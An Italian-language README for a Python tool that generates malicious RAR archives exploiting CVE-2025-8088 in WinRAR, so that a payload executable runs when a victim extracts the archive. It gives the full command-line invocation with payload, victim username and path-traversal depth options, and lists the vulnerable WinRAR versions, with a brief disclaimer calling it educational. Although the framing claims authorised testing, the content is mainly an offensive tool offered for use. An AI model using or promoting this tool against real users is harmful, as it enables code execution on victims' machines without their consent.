
Generatore di exploit basato su Python per CVE-2025-8088 in WinRAR, che crea archivi RAR dannosi che eseguono payload all'estrazione per test di sicurezza autorizzati.
Questa repository contiene un generatore di file RAR dannosi che sfrutta la vulnerabilità CVE-2025-8088 in WinRAR, consentendo a un file apparentemente legittimo di eseguire un payload quando la vittima lo estrae.
python3 exploit_7.12.py \
-p payload.exe \
-o exploit.rar \
--username [Ojo USUARIO VICTIMA] \
--placeholder-len 200 \
--max-up 12 \
--verbose
python exploit_cli.py --help
---
## ⚠️ Avvertenza
Questo progetto è solo a **fini educativi e di ricerca**.
Non deve essere utilizzato su sistemi reali senza autorizzazione esplicita.
L'autore non si assume alcuna responsabilità per l'uso improprio.
---
## Versioni vulnerabili
### WinRAR – CVE-2025-8088
- Le versioni di winrar 7.12 precedenti sono VULNERABILI
- Versioni precedenti alla patch ufficiale
- Windows 10 / 11
- Architetture x86 e x64